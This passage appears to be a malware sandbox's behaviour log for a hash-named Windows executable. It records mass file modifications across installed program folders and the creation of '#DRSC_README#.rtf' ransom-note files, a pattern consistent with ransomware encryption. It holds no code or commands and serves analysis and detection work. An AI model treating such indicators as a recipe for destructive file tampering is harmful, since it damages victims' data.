710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Sydney 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ta.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Araguaina 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{C2992E49-2AEA-49C3-A145-FACF92F54BB3}\84.0.4147.89_chrome_installer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Graph.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chihuahua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\external_extensions.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Resolute 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200723104248.pma 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program 